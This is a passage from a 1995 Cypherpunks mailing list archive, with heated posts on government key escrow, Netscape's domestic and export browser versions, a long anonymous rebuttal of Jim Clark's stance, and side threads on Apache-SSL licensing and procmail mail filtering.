> need to carefully think about the role that's been "given" to them
> (whether by fortune, hard work, or being in the right place at the right
> time) and do what's right.

Except for Louis Freeh and Dorothy Denning, I haven't heard real people
support GAK domestically, although Geoff Greiveldinger's pitch at the Sept
NIST meeting was 99 & 44/100% domestic. I'll be listening pretty
carefully this Tuesday.

I think we need to save our fury for real statements about making
non-GAK illegal for domestic use. If this starts to condense out
of the Ether, I expect that the civil liberties lobbies will
get real loud. The ACLU and VTW were both vocal at the September
meeting, and EPIC was there, along with folks like Professor Hoffman of
GW.


> And what Netscape agrees to put in future releases of its browsers or its
> servers could have dramatic effects on the whole climate.

I have no problem with Netscape having a GAK-ified browser in addition
to a real one. At least as long as the GAK'd version is clearly identified
-- a logo saying "big brother inside" covering 25% of the screen should
do it for me.


> And if export laws demand GAK in exported products, Netscape should "do
> the right thing" and have two versions. It may add to their costs a
> little, but it's better than building in the machinery for a GAK law to
> later be passed.

Netscape is currently doing two (or ten) versions. This simple
fact seems to have been lost by most of the posters in the
past few days.

If the issue is just that people don't like the idea that the free,
downloadable is GAK'd and that they have to pay $50 for a browser
with strong crypto, please take your whining off list. Or find
one you like (Netmanage's is too buggy for me, but Mosaic version 2 is
quite usable, as is Microsoft's, IMHO)

> (Explain something to me. I have never, ever understood why it is a
> concern of the U.S. government that we help build in GAK for foreign
> governments, that we make sure that products intended for export to
> France or Syria have GAK that allows those governments to read the
> traffic of their citizens. And if the concern is that exported versions
> of software must be readable to the _United States_, then this is a
> non-starter in terms of sales in many or even most foreign countries! I'm
> sure France will welcome with open arms a version of Netscape that allows
> the NSA to read the traffic of French citizens. Oh, by the way, what
> legal jurisdictions will be involved in obtaining the escrowed keys of
> foreigners? The answers are both clear and murky, if you catch my drift.)

The "criteria" (see my http://www.isse.gmu.edu/~pfarrell/nistmeeting.html
page) clearly say that approved systems can _not_ interoperate
with unapproved systems. This means that exportable systems can not
interoperate with, say, PGP.

There was talk about having multinational treaties so the French, Iranian,
and other "friends" could access the GAK's messages, but that was
recognized as being many years out. Diplomacy is slow.

It was quite clear from multinational vendors that they thought
that non-US corporations would _absolutely not_ accept
GAK in the US.

The main effect of this stupid export stuff is to drive
crypto development offshore.

> If the U.S. insists on GAK _within the U.S._, as many of us fear is the
> long-term danger, then all bets are off anyway. But I would hope that
> Netscape does nothing to make it _easier_ to make this the case!

It was quite clearly implied at the September meetings that the
Government expected that vendors would do only one version, GAK'd.
This would allow the LEAs to tromple all over US civil liberties
at will.


> A viable thing for Netscape to do is to announce forthrightly that it will
> separate the issue of export from what it sells in the U.S., that there
> will be NO GAK included in any U.S.-sold packages. The quest for an "all
> world" version, freely exportable, should not take precedence over the
> civil liberties issues. And I predict that any slight losses in market
> share or slight increases in product cost will be _less_ than the effects
> Netscape will see if their product comes to be associated with "Big
> Brother Inside."

I've been developing software too long to accept that the increases
in product support costs will be "slight". But I agree that
Netscape should _continue_ to have three separate versions, one for
domestic use, a second one for export from the US, and the third  with
Fortezza for sale to Govie agencies that want it.  They probably need to
add a fourth version, a strong foreign version developed offshore.

Tim's suggestion of a formal statement that separates domestic product
from export, and clearly leaves GAK out of US products, is a very good one.
It is close to what Netscape is doing now, it is completely consistent
with current and publicly announced policies, and it would
let this list return to discussions that are relevant to
cryptography.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 3 Dec 95 17:34:08 PST
To: nobody@REPLAY.COM (Anonymous)
Subject: Re: apachessl info
In-Reply-To: <199512040015.BAA22063@utopia.hacktic.nl>
Message-ID: <199512040129.RAA19146@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> What I missed was the how-to on getting a certified key. Wasn't there a way
> of doing that through e-world (Apple's on-line service) for free?

	"Low-assurance" client keys are free. Server keys are not free.
http://www.verisign.com/

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael H. Warfield <mhw@wittsend.com>
Date: Sun, 3 Dec 95 14:29:53 PST
To: cypherpunks@toad.com
Subject: Re: your mail
In-Reply-To: <199512031959.OAA00178@localhost.cjs.net>
Message-ID: <m0tMMvg-0001TUC@wittsend.com>
MIME-Version: 1.0
Content-Type: text/plain


Christopher J. Shaulis enscribed thusly:

> My mail??

> Who is the wise guy who keeps putting "Your mail" in the topic?

	Kidding, right?  Snicker.

	It's not a who - it's a what.  Some twit DID NOT put a subject on the
ORIGINAL message.  The next person(s) who replied to him had a mail program
which recognized the lack of a "Subject" and substituted "Your mail".  That
beats a subject line of "Subject: Re:"...

	Actually and technically they don't bother to "spot" the lack of
a Subject.  The programs set their default subject for replies to "Your mail"
and then if they read a Subject header, it overrides the default.  I know
elm does and I believe pine does, as well as a host of others.  

	Works well for personal mail even if it does look STUPID on a
mailing list.  Only known cure is to make sure you have a REAL SUBJECT.

> Christopher


-- 
 Michael H. Warfield    |  (770) 985-6132   |  mhw@WittsEnd.com
  (The Mad Wizard)      |  (770) 925-8248   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 3 Dec 95 18:07:08 PST
To: rthomas@pamd.cig.mot.com (Robert Owen Thomas)
Subject: Re: Globally legal Netscape
Message-ID: <199512040209.SAA03343@ix12.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Fred Cohen wrote:
> Law enforcement is almost universally used as an excuse to
> collect information on individuals in the name of helping society,
> but this power is easily abused.

In addition to Fred's good examples of abuse of information, 
I'd like to add the use of census data to arrest Japanese-Americans during
World War 2 - not only was the data collected under great promises that
citizens could trust the government, and that it would only be accessible
for lawful purposes, it was used to attack people who weren't doing
anything illegal or wrong when it was collected.  

Everything you say on the nets sticks around, and if the government
has master keys, then even what you said in private sticks around.
It's not illegal to say "[expletive deleted]" in private mail today,
and won't be even after Exon-II passes, but it _may_ be kept around
so they'll know whose mail to get law enforcement access to to enforce
the Verbal Morality Act of 2001.

At 04:26 PM 12/3/95 -0600, rthomas@pamd.cig.mot.com (Robert Owen Thomas) wrote:
>look, this is just a *bit* extreme.  having been one of those folks sworn
>to uphold the Constitution, I can tell all of you that there is no master
>plan to rid the American people of their rights and freedom.

Remember the fundamental job of any bureaucracy - self-preservation and growth,
by whatever means necessary.  No need for any master plan or conspiracy.
Are there herds of opportunists interested in taking political advantage of
anything that comes their way?  You bet.  Listen to Louis Freeh talk about
the need to be able to eavesdrop on anybody they want to be able to catch
narco-terrorist child pornographers, and think about whether you want the FBI
able to tap your email - especially if you occasionally send email to people
whose chronological age you don't know using language that Senator Exon
might disapprove of.  Reminds me a lot of Harry Anslinger talking state
governments into banning Evil Marihuana in the waning days of Prohibition.

>o  Robert Owen Thomas:  Corvette pilot. Cymro ydw i. User scratching post.  o
                                         ^^^^^^^^^^^
Between the anti-encryption cops and the English-Only right-wingers,
you may not be able to say that much longer - Welsh isn't quite as heavily
encrypted as, say, Navajo, but it's bound to violate some law soon enough :-)
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281

# Anybody notice that Microsoft's Wide Open Road ad has barbed-wire fences
# on both sides of the road?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 3 Dec 95 09:29:56 PST
To: cypherpunks@toad.com
Subject: Re: Talking to Jim
Message-ID: <199512031730.SAA06145@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Jim Clark was quoted as having written:

> I made some pragmatic comments.

> I said that if we are to use this encryption technology in 
> business, we must have a better solution than to limit 
> keylength or put keys in escrow. All governments of the world 
> have a valid concern about terrorism and other activities of 
> concern to the security of their nations. 

So what?  If their position were (as it has long been in some countries) that their "concern" is best addressed by wholesale eavesdropping and informant networks, would you cave to that, too? This is an absurd foundation.

> All of them will continue to restrict our ability to provide 
> products to their markets unless we build in some mechanism 
> that allows them to legally access information that is in the 
> interest of their national security. 

Whoa!  You're giving away the store without a fight!  You've been able to capture what, 60-70% of the browser activity "market" and get a huge amount of capitalization from the public market, and you're whining that the world's going to end if government "restrictions" continue, just because those restrictions might slow down your commercial world conquest? Give me a break! 

LET THEM CONTINUE to restrict! That will take care of itself quite handily. You're just afraid you'd miss some opportunities, or be one of the commercial casualties, isn't that right? Isn't that what this is really all about? And a valid concern, too, but not at the expense of my freedom! It seems clear from the way you put this that world standardization at ANY level of security would satisfy your commercial objectives. 

> (We obviously cannot be involved in determining what is legal 
> by the laws of that country.) 

Oh? Since when? Commercial interests have long had a heavy influence on government policies, up to and including laws and wars. Your own U.S. government doesn't hesitate to attempt to influence other governments in their enactment and/or modification of laws, even constitutions. Do you think for a moment that the Caribbean Basin Initiative (to mention just one) has anything remotely to do with the U.S.'s altruistic interest in helping Basin countries' economies? Its OVERRIDING purpose is to influence their tax laws and effectively extend U.S. jurisdiction to those countries.

In any case you're writing as if you were selling screwdrivers, not the new wave of IT. You are riding the crest of a technological revolution that is going to make some laws, some governmental policies, even some governments, MOOT. Those it doesn't bypass it will certainly not leave untouched. To be sure, there is awesome power in the hands of governments, but it is also a fact that governments can be very fragile things. Many have fallen in the history of humankind, and modern "free" societies are supposed to have governments that serve, not dictate.

Governments, geared to human processes that proceed at human speeds, unable in their inefficiency even to keep up with ordinary humans, will be completely unable to stay ahead of IT. Governments that get in the way will disintegrate. Governments that embrace the future will survive. For you or anyone else to run around to the rear and stick their tongue firmly up government's ass is exactly the wrong strategy for the future.

> This is not just a US government problem. Until recently, 
> France did not even allow us to sell products with 40-bit 
> keys, much less 128-bit keys. 

And some of us think that such idiocy, like celibacy, is a self-correcting phenomenon in this information age. If the French government wants to keep France behind the curve, that's fine. The French people will eventually put fire to their politicians' feet as their economy is increasingly bypassed and slides down the tubes. It's not YOUR problem to solve by going into agreement with the totalitarian objectives of Stone Age governments.

> A lot of ordinary citizens are rightly concerned about their 
> own privacy. 

No shit!

> I am one of them. 

You could have fooled ME!

> I do not want the government to snoop on me, 

It seems you really don't care, as long as you can firm up your billion and maybe roll it up to ten.  Money buys a lot of things in this world, and as long as Jim can buy HIS privacy some day, hey, that's cool! But give a bit of thought to whether your children's privacy and safety will be able to be bought in a world made safe for Big Brother by commercial interests willing to give away the freedom store.

> but in fact the government, through the FBI, can now tap my 
> phone without my knowing it by simply getting sufficient 
> evidence that I am conducting illegal activities, then 
> presenting this evidence to a court to get permission. I have 
> no say in the matter.

So, therefore, nothing matters, right?  Don't fight for the right to put locks on your doors, because if the government really wants to get in your house, they will. Here's a flash bulletin, Jim: That's not the kind of thinking that secured the freedoms Americans like to think they have. It is, though, the kind of thinking that can end them.

> If we as a company were to take the position that in no case 
> will we allow a government to get access to our encrypted 
> messages, or refuse to allow key escrow with our products, 
> the governments of the world will quickly put us out of 
> business by outlawing the sale of our products in their 
> countries. 

Obviously specious, because Netscape came into existence in a world of controls over which it had no influence.  Having thus come into existence, and quite successfully so far, it is absurd to claim that if you don't cave and become supine enough to slide under the barriers that already existed, you will be put out of business.

I believe you have underestimated the power of a leading-edge 21st-century information product that is "Not available where regulated." I think you're copping out and looking for the easier, "Now with the best encryption available! (because no one is allowed to offer better)"

> The fundamental issue is how do we accommodate the 
> requirements of governments, while protecting our 
> rights as citizens.

No, Jim, that is not nor has it ever been the fundamental issue for business or individuals, least of all in the last few centuries in the free world.  The issue for free people is how to secure the blessings of freedom, shaping government as necessary, so they can get on with their lives, which in turn is, after all, what everything is ultimately about.  Your statement is more suited to the European authoritarian mindset, which has never quite come to grips with the idea of natural rights originating in individuals and flowing, WHEN AND IF THEY FLOW, by delegation to governments.

The legitimate purpose of government is not to tell you what your boundaries and constraints are. The Declaration of Independence correctly states that the legitimate purpose of government is to secure freedoms which do not themselves originate in government.

> None of this represents the position of Netscape with 
> respect to what we will do. 

Oh, garbage! You've just set forth the viewpoints of one of the key people who determines what Netscape's positions will be, and further, that you agreed in this with a bunch of other commercial interests! 

> But if we do not come up with a solution to this problem 
> that is acceptable to each government, 

There it is:  Supine, prostrate, submissive.  Jim, there are some alt. newsgroups where you could make a big hit with that approach.  A few thousand Mistress X's in leather await a man willing to obey their every command.

> we will not be able to export our products, 

Whiiiiine!

> except with a short key length (e.g. 40 bit keys), and that 
> will not be acceptable to corporate customers in other 
> countries. They will create their own solution, and we will 
> not be able to sell to a larger world market. 

This is the heart of the matter. Dominating the U.S. market is in no way sufficient to your appetite. Maintaining a clear technological lead here, with consequent pressure on controlled markets to lift their controls and to pressure the U.S. to lift its export controls, is not what you see as the better strategy. You fear losing momentum, you covet those foreign markets, perhaps you even fear the emergence of superior foreign technology given clear incentive over time. 

Your choice, then, is to be an instrument in furtherance of totalitarianism in order to improve what you perceive to be your shorter-term odds, and to justify it on the basis that it is inevitable anyway. Bad. Very bad.

> In fact, we could even be ordered by our own government to 
> establish a key escrow system for its use inside the US.

You seem to have walked so far down the road of saluting government that you've forgotten that there is a Congress. This is supposed to be a government of laws, not orders. It's an entirely different issue, though, than the one of embracing GAK in a bid for world browser conquest. If U.S. GAK comes to pass, it will not be without discussion and debate, some of it no doubt quite heated. Everyone will have to deal with it as they see fit. That's not the same thing as a cow offering itself for genetic engineering in order to slither a new, longer neck under the bottom strand to reach that greener grass at the expense of its legs (that's tortured, but I think it makes a nice image).

Your manner of expression supports my impression that someone has inoculated you with GAK juice.  The power of influential people to do that, and to follow through on their veiled or not so veiled threats depends entirely on their remaining unseen to the public. I'd STILL like to know who got to you and what they said.

> Ironically, anyone in the US may import unbreakable 
> encryption technology from another country -- we just 
> cannot sell it back to them. No one ever accused the 
> government of being rational.

This is the clearest thing you've written in the whole piece (though it sheds no light on Netscape's position). Makes you want to kick yourself for not having set up shop in some other country in the first place, doesn't it?  

You can BET that other people ARE setting up shop in other countries, even as we write. The logistics of information over distance are collapsing at an astonishing rate. What would have been difficult or prohibitively expensive five years ago is feasible today. What seems too much trouble today will be a piece of cake next year.

What you *could* have done early on, had you or anyone else clearly seen where this was headed (and hey, who did?), would have been to contract with a resource in a crypto-unregulated jurisdiction, perhaps even one where constitutional or legislative bars to such control exist or could be construed, to license the necessary parts to your company in the form you need them. Done right, this could have positioned you to import the crypto as it could be imported into any supposedly free country, penalizing thereby only the thoroughly clueless countries. You would never have been in the position of exporting it. If the dotted line in your product can't be at the "hooks" level because of restrictions, there is some level higher than that and lower than "run netscape" at which the dotted line CAN be drawn and still pass muster, or all software in the world would be stillborn.

Too late now, eh? Maybe. Maybe not.

> I chair an industry group called the "Global Internet 
> Project", with members from almost twenty companies, 
> including companies from Asia and Europe. This was the 
> central issue we all agreed upon this morning, and we 
> are putting together a policy statement whose purpose 
> is to educate lawmakers on the importance of quick 
> resolution of this matter.

That's scary. You'd be better advised to hang around with people steeped in the rugged individualism of America's genesis. If you put your efforts into creating irresistible forces in the marketplace you could leave the process of educating lawmakers to their constituents, who would do it by putting political fire to their feet, something to which politicians respond better and faster in any case.

How many of the people who pay your bills do you think will be comfortable with the idea of you cuddling up with a bunch of other self-appointed world planners (some of whom no doubt come from countries where freedom is a quaint notion that has never quite been fully grasped), dividing up their freedoms and handing them to governments on a silver platter, presumably in exchange for injections of grease to your money machine?

> Thanks for your concern. 

You're welcome.

> Let me know what you like and don't like.

Now you know.

One of the great values in the new information paradigm is that you can, if you choose, read messages no one would have dared bring you in the insular past. Executives who get to hear only what they want to hear usually fail, often spectacularly. Any executive in a publicly-discussed business today who wants to take the pulse of real people has only to tune in and see for himself. It takes courage, though.

We Jurgar Din
(that will have to suffice: I do not yet live in a free country)

+"The battle, Sir, is not to the strong alone. It is to the+
+vigilant, the active, the brave. Besides, Sir, we have no +
+election. If we were base enough to desire it, it is now  +
+too late to retire from the contest." -Patrick Henry 1775 +


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMMHTCUjw99YhtpnhAQFq8gH+Kr2QhcP7wWh0jdOM+2UBWldm0jDgcR5p
HTXsoHbYVc8Q8LRwpcV33T4Jq+z7OTFGBX7RuyIRDkGSmloZ6NGbag==
=Skic
-----END PGP SIGNATURE-----










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Sun, 3 Dec 95 18:56:37 PST
To: cypherpunks
Subject: Java Cup International -- $1,000,000 in prizes
Message-ID: <9512040256.AA14558@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


[Wouldn't it be fun to win an UltraSPARC for writing some free code to
secure Java applications?  The catch is: No entries can use
encryption!  I wonder how they expect electronic commerce, security,
or micropayment systems without encryption.  See the Official Rules.
-- John]

Sun Microsystems has announced the JAVA Cup International, a contest
to promote the creation and public availability of small,
platform-independent applications called JAVA applets. Software
developers will compete to develop the most innovative and creative
applets. The JAVA Cup International contest begins immediately and
ends March 31, 1996.

Who's Eligible: Developer community including business, academic, and
individual programmers worldwide.

Prizes: Prizes will total $1,000,000 in Sun equipment (U.S. list)
distributed among winners. One grand prize and three prizes per
category (two individual prizes and one team prize). The first 1,000
to submit entries will receive a Java Coffee Cup & T-Shirt.

Categories: Productivity Tools, Internet/Web Agents, Educational,
Developer Tools, Entertainment and Games, Unlimited.

Judging Criteria: Best Graphics, System Friendliness, Clean Code,
Security, Reliability, Interactivity, Innovation.

Check out http://javacontest.sun.com for complete details. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 3 Dec 95 10:07:09 PST
To: cypherpunks@toad.com
Subject: Jim Clark, "Mr. Bubble"
Message-ID: <199512031807.TAA07090@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Alex Strasheim, 12/2/95, 6:53 PM:

>I don't expect Netscape, as a corporate citizen, to engage in civil
>disobedience.  But I hope that Netscape will take seriously its obligation
>to protect the rights of citizens. 

      I do. I regard the capacity to do so as crucial, and I regard the
fact that you *don't* expect them to as very telling. As has been pointed
out extensively, the chances that he'll manage to hang on to his
soft-earned cash until he can sell out are a long shot--unless he takes a
stand against GAK. Governmental policy on the subject of crypto has relied
upon secrecy, obscurity, and above all terrorizing individuals; the gov't
would be extremely reluctant to throw the book at Netscape, given its
symbolic significance in the market. And even if it did, Clark's future
would be assured--maybe after he got out of Club Fed, but assured
nonetheless.
      Let me be clear: if Clark and Netscape said "We're implementing and
releasing a version with a key length we support," crypto policy would be
the lead story on the evening news--and the gov't would lose. The only
question is how fast. 

>The decision that Netscape is faced with now is a big one.  It's going to 
>have widespread and long lasting consequences for privacy and civil 
>liberties all over the world.  When you look at what's going to happen on 
>the ground, it's probably as important as a major decision by the Supreme 
>Court.
>
>We understand that government officials in this country and elsewhere are 
>putting pressure on Netscape.  But you should understand that the public 
>is overwhelmingly in favor of universal access to strong crypto.  This is 
>a democracy, after all, and the FBI and NSA still work for the people.  
>If you need help standing up for what's right, you'll get it.  Take your 
>case to the public, and you'll be surprised at the response you'll get.

      You set forth all these silly generalities as though they suggest
that NS's best bet--for Clark, for itself, for the public--is to go along
with US policy? Bullshit. Their best bet is to use their golden-boy status
to sucker punch the gov't.

>Why not say:
>
>        1       Netscape will follow all laws and regulations.
>        2       The current rules are forcing Netscape to choose
>                between providing reasonable levels of privacy
>                to its customers and competing in the international
>                marketplace.
>        3       Netscape feels the rules should be changed to make
>                this choice unnecessary.

      Bah. Why not:

      1     Make illegal software available by FTP
      2     Explain it's doing so because ITAR is bullshit
      3     Face the gov't down in the press and in the courts 

>If you make that argument publicly, you'll get widespread support from the
>business community and the general public.  And if it turns out that we
>can't win, you can always fall back on selling totalitarian-friendly
>products.

      If NS did this, they'd win BIG.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMMHndb3g0mNE55u1AQG3cAH/dQnrTUyZRIdz1P3lTGhQzOqvG2NSWdeh
YVYPN+wTZBfnBWlMwIkODAuyafbyFEGr5+lsgTBOtYDCVWFsW8LdWQ==
=+Wxw
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sun, 3 Dec 95 16:20:16 PST
To: rthomas@pamd.cig.mot.com (Robert Owen Thomas)
Subject: Re: Globally legal Netscape
In-Reply-To: <9512031626.ZM17818@pamd.cig.mot.com>
Message-ID: <9512040017.AA26026@all.net>
MIME-Version: 1.0
Content-Type: text


> look, this is just a *bit* extreme.  having been one of those folks sworn
> to uphold the Constitution, i can tell all of you that there is no master
> plan to rid the American people of their rights and freedom.

The problem is that there is no master plan to uphold it.  Freedoms are
rarely lost all at once.  Rather they are nibbled away in the name of
crime control, keeping people from hurting themselves, religious beliefs,
and the like.

> this is not to say we should not keep a sharp and keen eye open for any
> assault upon our liberties.  rather, having "BEEN THERE", i just do not
> see any threat along the lines of, er, Hitler, Stalin, Mussolini, et al.

Nobody in power saw the threat of Hitler even after he invaded Poland. 
In the early days, the Jews thought that being identified as Jews was no
big deal.  The Chinese cameras were portrayed as a way to reduce crime. 
The files kept by Iraq on the Kurds were supposedly used to track
criminals.  Law enforcement is almost universally used as an excuse to
collect information on individuals in the name of helping society, but
this power is easily abused.

	- It was abused in the US in the 60s against blacks seeking equal
	rights - in the name of civil order.

	- It was abused in the 50s against Americans who were even
	peripherally associated with the Communist party - in the name
	of civil order.

	- It is being used today in the name of stopping white supremacists
	and drug dealers - in the name of civil order.

Just like in the 50s and the 60s, the FBI is the one pushing for more
wiretaps and less privacy, and just like the 50s and 60s, people are
buying the anti-crime claim when in fact, this is about political power
over the rights of individual citizens.

Now I don't necessarily support more than one of these three causes, but
I do know that when one person loses their right of privacy, we all lose
our rights as well.

> let's try to keep this in perspective, Fred.  perhaps a little less
> caffeine would help?  ;-)

I haven't had any caffeine lately, but I did go for a nice hike this morning.
It's a natural high.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 3 Dec 95 19:26:27 PST
To: JHupp@Gensys.Com
Subject: Re: Apachessl (was your mail)
In-Reply-To: <2B69E5170C1@Novellnet.Gensys.com>
Message-ID: <199512040321.TAA23272@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 	Personally, I would prefer to see the whole thing given away, and if I
> had done it, it would be.  But he (or his contractors / employees ) did
> the work that went into modifying it, and if he wants to sell that
> work he bloody well can.

	Hell, *I'd* prefer to see the whole thing given away. Ain't
gonna happen though. It's called US patent law. (I would have put
*much* less work into it, if it was going to be given away, though, so
the fact that people have to pay for it actually results in a better
non-commercial version as well. [the only thing you don't get with the
non-commercial version is commercial use licensing for the patent
stuff and support..])
	Maybe though, if the various lawsuits disputing the patents go
through and the patents are found invalid or something, commercial use
will be possible for free.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Campbell <edge@got.net>
Date: Sun, 3 Dec 95 17:55:30 PST
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <199512040320.TAA29525@you.got.net>
MIME-Version: 1.0
Content-Type: text/plain


>Gee, and Tim May didn't get a new ISP when his current PC-ISP canceled 
>his Usenet access because of his protected speech and then gave it back 
>only if he included a disclaimer on his messages.  Fire away, Cypherpunks!!!

Get your facts straight before spewing this nonsense to the masses. There's
not an ounce of reality reflected anywhere in that whole sentence.
--
   Jay Campbell                edge@got.net - Operations Manager
   -=-=-=-=-=-=-               Sense Networking, Santa Cruz Node
   Jay@Campbell.net            got.net? PGP MIT KeyID 0xACAE1A89           
 
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 3 Dec 95 16:29:06 PST
To: Jonathan Zamick <JonathanZ@consensus.com>
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <v02120d02ace53224f233@[157.22.240.13]>
Message-ID: <Pine.BSF.3.91.951203191056.6206B-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Dec 1995, Jonathan Zamick wrote:

> 
> >And thus we return to my original point, which is that it will depend on
> >what is said/disclosed.  If every copy of GAKscape had a banner, bigger
> >than the Netscape "N" which said, "The government can read every message
> >you send using this software no matter what you do" then I think
> >consumers will be hard pressed to say they weren't warned.
> 
> I don't mean to be inflammatory, but it isn't much of a point. They aren't
> going to put such a banner up because that would limit their business. The

Once again, I must disagree.  Several bulletin boards I frequent include 
an opening banner announcing that, essentially, all messages left there 
are "public" and can be read by anyone.  I can get the exact language if 
you like.  The message specifically refers to the wiretapping statute, 18 
U.S.C. Section 2510 et seq.  This keeps the sysop, arguably, from 
suffering civil liability if mail is intercepted.  Nobody reads the 
banner, but I believe that it has more effect than a fig leaf.

> goal of Netscape (though I don't single them out), any corporation that would
> profit from business of those who seek encryption while still allowing GAK,
> and the government, is to limit the public's awareness of the size of the
> hole. If they let people know the extent of the hole, then they'll use
> products w/out it which blows profits from companies involved, and doesn't
> benefit the government who want it in common use.
> 
> >I disagree.  Almost nobody read the fine print on the back of a note you
> >sign when you buy a car or otherwise take out a loan, but the provisions
> >are generally enforceable ...  Ignorance is not necessarily an excuse.
> 
> The question is whether there was false representation of the security of
> the product.
> 1. The general knowledge of encryption and secure electronic financial
> transactions is significantly lower than that of more standard
> transactions.
> 
But how many of those who are less knowledgeable about such things expect 
the level of privacy you automatically infer?  Is that expectation 
reasonable?  Does the party have any duty to inquire???

> 2. Applying for a loan or buying a car involve actively going out, negotiating,
> signing contracts, etc. It will be much simpler to simply stick your vital
> info into a 'secure' browser.
> 
Getting a browser involves going to the store and installing the software 
or surfing to a site and downloading the software.  Then it must be 
installed.

> 3. The choice of browser to use will be done, based on representations by
> companies about the security of their product. If Netscape doesn't
            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 
I doubt it in the case of the less sophisticated (and the more 
sophisticated are on their own).  I suspect that Mr. Newbie is more 
likely to pick a browser on the basis of what his friend tells him,  or 
what PC Computing tells him, or the fact that he read about Netscape in 
the business section of the paper.  

> explicitly
> state in direct terms when accessing the browser that the GAK is a
> potential security risk, then they will be sued. Simply because someone
> will get blamed.

Getting sued and being liable are very different, just as getting charged 
with a crime and having done something morally wrong can be very 
different.  I am much less confident than you apparently are that the 
court system (and products liability law) are likely to impose duties on 
the makers of browsers such as you suggest.  In an advancing 
technological area, I don't believe that liability will be imposed so 
quickly, especially if some disclosure is made.  What disclosure is 
required is likely to be fact specific on a case by case basis until the 
law has time to develop some sort of standards.

Can I expect to recover from Ford for my injuries in a car wreck because 
I would not have been hurt in a Volvo, when Ford meets all federal 
standards?  Generally not. 

> Since they (or again any company that incorporates GAK.. I really don't
> want to target Netscape in specific) will make the threat sound as
> insignificant as possible, and not bring it to people's attention (and they
> can't afford to do so) when (not if) it is breached they will be taken to
> court repeatedly.

Don't forget, taking them to court takes $$$.  And they only have $5 
Billion to pay for lawyers ...

 > > >
> >EBD
> 
> Jonathan
> 
> ------------------------------------------------------------------------
> ..Jonathan Zamick                    Consensus Development Corporation..




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jadestar@netcom.com (JaDe)
Date: Sun, 3 Dec 95 19:34:23 PST
To: adam@homeport.org (Adam Shostack)
Subject: Re: available news/mail filtering
In-Reply-To: <199512012326.SAA20363@homeport.org>
Message-ID: <199512040332.TAA07600@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Beavis B. Thoopit wrote:
> 
> | What news and mail filter programs are available?  Pointers
> | will be appreciated.
> 
> I like procmail.  It's a steep learning curve, but well worth the
> effort.
> 
> ftp.informatik.rwth-aachen.de:/pub/packages/procmail/procmail.tar.gz 

	I disagree about the grade of the curve.  However I might 
	have bumped into better learning resources.  I'd suggest
	the following URL (lynx clean for us non-GUI CLImbers and 
	CLUEful types)*:

	http://www.jazzie.com/ii/faqs/archive/mail/filtering-faq/

	This is maintained by Nancy McGough (nancym@ii.com??).

	She and Stephen R. van den Berg (author of procmail) are
	active on the procmail mailing list:
		procmail@informatik.rwth-aachen.de

	And of course, subscription and information requests 
	for this list to:
		procmail-request@informatik.rwth-aachen.de

		----------------------------------------

	I suppose (since this is my first posting to cypherpunks)
	I might as well introduce myself.  I've been lurking on the 
	list for about two weeks.  This is the busiest list that
	I'm subscribed to.  By comparison the Pegasus Mail list 
	only gets a hundred messages a day.  Well that one's at work
	so I see it every day -- the ones here at netcom I might
	flake on for a few days at a time.

	I've had a mild (armchair) interest in crypto since I was 
	in high school.  I heard of this list via netnews but actually
	got the address from someone at a Kabuki-west (a fairly
	small, discreet Bay Area social mailing list that's used to organize
	weekly dinners at area restaurants and announce other food related
	events to aspiring computer nerds -- such as me-- and other 
	professionals).

	Given my lack of schooling and formal study on the subject 
